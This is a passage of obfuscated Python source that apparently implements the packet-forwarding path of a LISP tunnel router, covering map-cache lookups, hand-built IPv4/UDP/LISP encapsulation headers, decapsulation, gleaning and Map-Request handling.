lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] , II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ,
# I1IiiI
II1i111Ii1i [ 40 : 48 ] , II1i111Ii1i [ 48 : 56 ] , II1i111Ii1i [ 56 : 64 ] , II1i111Ii1i [ 64 : 72 ] ) )
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
def o0OOOoO0 ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 73 - 73: I11i % i11iIiiIii - I1IiiI
Ii1iI111II1I1 = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , Ii1iI111II1I1 ) )
if 91 - 91: OOooOOo % OOooOOo - I1IiiI
if 18 - 18: I11i - i11iIiiIii / II111iiii . OOooOOo
if 55 - 55: i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
def OO0000o ( ts , msg ) :
global I1I11I1I1I
if 42 - 42: Oo0Ooo
if ( I1I11I1I1I == False ) : return ( None )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if ( ts == None ) : return ( time . time ( ) )
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
def Oo0o0O00 ( a ) :
ii1 = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( ii1 )
if 39 - 39: Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * iII111i + I1IiiI
if 77 - 77: Ii1I + II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
if 41 - 41: Oo0Ooo
if 10 - 10: Oo0Ooo / Oo0Ooo / I1Ii111 . I1Ii111
if 98 - 98: Oo0Ooo / I1IiiI . O0 + OoO0O00
if 43 - 43: II111iiii . oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
iI1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
IiI = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: OoO0O00 + I1IiiI % I1IiiI
def oO0o0oooO0oO ( packet ) :
global lisp_map_cache , o0oOoO00o
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
Iii1iiIi1II = OO0000o ( None , "Fast" )
if 60 - 60: I1IiiI - oO0o * I11i % II111iiii
if 62 - 62: iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
iii11I = 0
I1Iii1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if 30 - 30: OoooooooOO - OoOoOO00
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
I1Iii1 = packet [ 12 : 16 ]
iii11I = packet [ 32 : 35 ]
iii11I = ord ( iii11I [ 0 ] ) << 16 | ord ( iii11I [ 1 ] ) << 8 | ord ( iii11I [ 2 ] )
if ( iii11I == 0xffffff ) : return ( False )
I1II1 ( "Decap" , packet )
packet = packet [ 36 : : ]
if 75 - 75: iIii1I11I1II1 - Ii1I . Oo0Ooo % i11iIiiIii % I11i
if 55 - 55: iII111i . II111iiii % OoO0O00 * iII111i + ooOoO0o + Ii1I
if 24 - 24: Oo0Ooo - oO0o % iIii1I11I1II1 . i1IIi / O0
I1II1 ( "Receive" , packet )
if 36 - 36: I1IiiI - I11i
if 29 - 29: ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
I1ii11 = Oo0o0O00 ( packet [ 16 : 20 ] )
IiI . instance_id = iii11I
IiI . address = I1ii11
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if ( ( I1ii11 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
if 24 - 24: i11iIiiIii % iIii1I11I1II1 + OOooOOo / i11iIiiIii
if 70 - 70: OoO0O00 * O0 . I11i + I1IiiI . IiII
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - OoO0O00 - I11i
I1ii11 = IiI
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
if ( I1Iii1 != None ) :
OOO0oOOoo = Oo0o0O00 ( packet [ 12 : 16 ] )
iI1 . instance_id = iii11I
iI1 . address = OOO0oOOoo
oOOO00o000o = lisp . lisp_map_cache . lookup_cache ( iI1 , False )
if ( oOOO00o000o == None ) :
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI1 , None ,
None )
if ( iIi11i1 ) : return ( False )
elif ( oOOO00o000o . gleaned ) :
I1Iii1 = Oo0o0O00 ( I1Iii1 )
if ( oOOO00o000o . rloc_set [ 0 ] . rloc . address != I1Iii1 ) : return ( False )
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
o00oo0 . add_recent_source ( iI1 )
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION and
o00oo0 . eid . instance_id == 0 ) :
I1ii11 . instance_id = lisp . lisp_default_secondary_iid
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if ( o00oo0 . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( o00oo0 . best_rloc_set == [ ] ) : return ( False )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
I1ii11 = o00oo0 . best_rloc_set [ 0 ]
if ( I1ii11 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 45 - 45: I1Ii111
iii11I = o00oo0 . eid . instance_id
i1I = I1ii11 . translated_port
oO = I1ii11 . stats
I1ii11 = I1ii11 . rloc
IIi1iiii1iI = I1ii11 . address
I1Iii1 = lisp . lisp_myrlocs [ 0 ] . address
if 25 - 25: I1ii11iIi11i + O0
if 28 - 28: OoooooooOO
if 89 - 89: iII111i - ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo - I1IiiI / IiII / O0 % o0oOOo0O0Ooo * Ii1I
OOo = '\x45\x00'
O0II11iI111i1 = len ( packet ) + 20 + 8 + 8
OOo += chr ( ( O0II11iI111i1 >> 8 ) & 0xff ) + chr ( O0II11iI111i1 & 0xff )
OOo += '\xff\xff\x40\x00\x10\x11\x00\x00'
OOo += chr ( ( I1Iii1 >> 24 ) & 0xff )
OOo += chr ( ( I1Iii1 >> 16 ) & 0xff )
OOo += chr ( ( I1Iii1 >> 8 ) & 0xff )
OOo += chr ( I1Iii1 & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 24 ) & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 16 ) & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 8 ) & 0xff )
OOo += chr ( IIi1iiii1iI & 0xff )
OOo = lisp . lisp_ip_checksum ( OOo )
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = O0II11iI111i1 - 20
o000oOoo0o000 = '\xff\x00' if ( i1I == 4341 ) else '\x10\xf5'
o000oOoo0o000 += chr ( ( i1I >> 8 ) & 0xff ) + chr ( i1I & 0xff )
o000oOoo0o000 += chr ( ( O0O0Ooooo000 >> 8 ) & 0xff ) + chr ( O0O0Ooooo000 & 0xff ) + '\x00\x00'
if 40 - 40: i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - I11i . i1IIi
o000oOoo0o000 += '\x08\xdf\xdf\xdf'
o000oOoo0o000 += chr ( ( iii11I >> 16 ) & 0xff )
o000oOoo0o000 += chr ( ( iii11I >> 8 ) & 0xff )
o000oOoo0o000 += chr ( iii11I & 0xff )
o000oOoo0o000 += '\x00'
if 99 - 99: O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
packet = OOo + o000oOoo0o000 + packet
I1II1 ( "Encap" , packet )
else :
O0II11iI111i1 = len ( packet )
oO = o00oo0 . stats
I1II1 ( "Send" , packet )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
o00oo0 . last_refresh_time = time . time ( )
oO . increment ( O0II11iI111i1 )
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
I1ii11 = I1ii11 . print_address_no_iid ( )
o0oOoO00o . sendto ( packet , ( I1ii11 , 0 ) )
if 67 - 67: I1IiiI
OO0000o ( Iii1iiIi1II , "Fast" )
return ( True )
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
def Ii1ii111i1 ( lisp_packet , thread_name ) :
global Oo0o , i1i1i1I , oOoo000
global o0oOoO00o , i1
global OOO0o0o
global iIiiI1
global oo0Ooo0
if 87 - 87: OoooooooOO - o0oOOo0O0Ooo / IiII . i11iIiiIii * OoooooooOO
Iii1iiIi1II = OO0000o ( None , "RTR" )
if 84 - 84: OoOoOO00 / I11i * iII111i / oO0o - i11iIiiIii . Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if ( oo0Ooo0 ) :
if ( oO0o0oooO0oO ( lisp_packet . packet ) ) : return
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
O0O0oOOo0O = lisp_packet
II11 = O0O0oOOo0O . is_lisp_packet ( O0O0oOOo0O . packet )
if 68 - 68: iII111i * OoooooooOO * iIii1I11I1II1 . II111iiii
if 81 - 81: OOooOOo / O0 + I11i + Ii1I / I1IiiI
if 27 - 27: OoOoOO00 * IiII
if 59 - 59: IiII . IiII - II111iiii + IiII . i1IIi . OoO0O00
if ( II11 == False ) :
Oo00OOo = O0O0oOOo0O . packet
o0o0O , oOO0OooOo , i1I , I1Ii = lisp . lisp_is_rloc_probe ( Oo00OOo , - 1 )
if ( Oo00OOo != o0o0O ) :
if ( oOO0OooOo == None ) : return
lisp . lisp_parse_packet ( Oo0o , o0o0O , oOO0OooOo , i1I , I1Ii )
return
if 70 - 70: Oo0Ooo . OoooooooOO - iII111i
if 30 - 30: I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
O0O0oOOo0O . packet = lisp . lisp_reassemble ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if ( lisp . lisp_flow_logging ) : O0O0oOOo0O = copy . deepcopy ( O0O0oOOo0O )
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
if ( II11 ) :
if ( O0O0oOOo0O . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
O0O0oOOo0O . print_packet ( "Receive-({})" . format ( thread_name ) , True )
O0O0oOOo0O . strip_outer_headers ( )
else :
if ( O0O0oOOo0O . decode ( False , None , None ) == None ) : return
O0O0oOOo0O . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
if ( II11 and O0O0oOOo0O . lisp_header . get_instance_id ( ) == 0xffffff ) :
i11i11 = lisp . lisp_control_header ( )
i11i11 . decode ( O0O0oOOo0O . packet )
if ( i11i11 . is_info_request ( ) ) :
OoOoO00O0 = lisp . lisp_info ( )
OoOoO00O0 . decode ( O0O0oOOo0O . packet )
OoOoO00O0 . print_info ( )
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
O00oo0ooO = OoOoO00O0 . hostname if ( OoOoO00O0 . hostname != None ) else ""
iiIii1ii = O0O0oOOo0O . outer_source
II1i111Ii1i = O0O0oOOo0O . udp_sport
if ( lisp . lisp_store_nat_info ( O00oo0ooO , iiIii1ii , II1i111Ii1i ) ) :
OooOo0ooo ( Oo0o , O00oo0ooO , iiIii1ii , II1i111Ii1i )
if 33 - 33: I1Ii111
else :
oOO0OooOo = O0O0oOOo0O . outer_source . print_address_no_iid ( )
I1Ii = O0O0oOOo0O . outer_ttl
O0O0oOOo0O = O0O0oOOo0O . packet
if ( lisp . lisp_is_rloc_probe_request ( O0O0oOOo0O [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( O0O0oOOo0O [ 28 ] ) == False ) : I1Ii = - 1
O0O0oOOo0O = O0O0oOOo0O [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o , O0O0oOOo0O , oOO0OooOo , 0 , I1Ii )
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
return
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if ( II11 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( O0O0oOOo0O . packet ) )
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
if 91 - 91: oO0o + OoooooooOO - i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
iiii1I1 = False
if ( O0O0oOOo0O . inner_dest . is_mac ( ) ) :
O0O0oOOo0O . packet = lisp . lisp_mac_input ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( O0O0oOOo0O . inner_version == 4 ) :
iiii1I1 , O0O0oOOo0O . packet = lisp . lisp_ipv4_input ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . inner_ttl = O0O0oOOo0O . outer_ttl
elif ( O0O0oOOo0O . inner_version == 6 ) :
O0O0oOOo0O . packet = lisp . lisp_ipv6_input ( O0O0oOOo0O )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . inner_ttl = O0O0oOOo0O . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 14 - 14: OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if ( O0O0oOOo0O . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( O0O0oOOo0O , ed = "decap" ) == False ) : return
O0O0oOOo0O . outer_source . afi = lisp . LISP_AFI_NONE
O0O0oOOo0O . outer_dest . afi = lisp . LISP_AFI_NONE
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0oOOo0O . inner_source , None ,
O0O0oOOo0O . outer_source )
if ( iIi11i1 ) :
o00O = O0O0oOOo0O . packet if ( iiii1I1 ) else None
lisp . lisp_glean_map_cache ( O0O0oOOo0O . inner_source , O0O0oOOo0O . outer_source ,
O0O0oOOo0O . udp_sport , o00O )
if ( iiii1I1 ) : return
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
if 60 - 60: iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
O0O0OOOOoo = O0O0oOOo0O . inner_dest
if ( O0O0OOOOoo . is_multicast_address ( ) ) :
if ( O0O0OOOOoo . is_link_local_multicast ( ) ) :
ooO000O = lisp . green ( O0O0OOOOoo . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( ooO000O ) )
return
if 53 - 53: o0oOOo0O0Ooo . iII111i / Ii1I
I11iiIi1i1 = False
oO00oo0o00o0o , IiIIIIIi , i1IiiI1iIi = lisp . lisp_allow_gleaning ( O0O0oOOo0O . inner_source , O0O0OOOOoo , None )
else :
I11iiIi1i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0OOOOoo , None , None )
if 66 - 66: OoO0O00 * Oo0Ooo
O0O0oOOo0O . gleaned_dest = I11iiIi1i1
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
o00oo0 = lisp . lisp_map_cache_lookup ( O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest )
if ( o00oo0 ) : o00oo0 . add_recent_source ( O0O0oOOo0O . inner_source )
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if ( o00oo0 and ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION or
o00oo0 . eid . address == 0 ) ) :
i1I1iIi1IiI = lisp . lisp_db_for_lookups . lookup_cache ( O0O0oOOo0O . inner_source , False )
if ( i1I1iIi1IiI and i1I1iIi1IiI . secondary_iid ) :
i1111 = O0O0oOOo0O . inner_dest
i1111 . instance_id = i1I1iIi1IiI . secondary_iid
if 82 - 82: ooOoO0o % Ii1I - ooOoO0o % OoOoOO00
o00oo0 = lisp . lisp_map_cache_lookup ( O0O0oOOo0O . inner_source , i1111 )
if ( o00oo0 ) :
O0O0oOOo0O . gleaned_dest = o00oo0 . gleaned
o00oo0 . add_recent_source ( O0O0oOOo0O . inner_source )
else :
I11iiIi1i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( i1111 , None ,
None )
O0O0oOOo0O . gleaned_dest = I11iiIi1i1
if 47 - 47: iIii1I11I1II1 . oO0o . OOooOOo * i1IIi
if 32 - 32: i11iIiiIii - i1IIi % OOooOOo . O0 % OoOoOO00 * Oo0Ooo
if 90 - 90: OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if ( o00oo0 == None and I11iiIi1i1 ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( O0O0oOOo0O . inner_dest . print_address ( ) , False ) ) )
if 62 - 62: i1IIi + Oo0Ooo % IiII
return
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if ( o00oo0 == None or lisp . lisp_mr_or_pubsub ( o00oo0 . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( O0O0oOOo0O . inner_dest ) ) : return
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
oo0OOOOOO0 = ( o00oo0 and o00oo0 . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( Oo0o , Ooo ,
O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest , None , oo0OOOOOO0 )
if 26 - 26: iIii1I11I1II1
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "map-cache miss"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 79 - 79: OoOoOO00 % IiII % Oo0Ooo
return
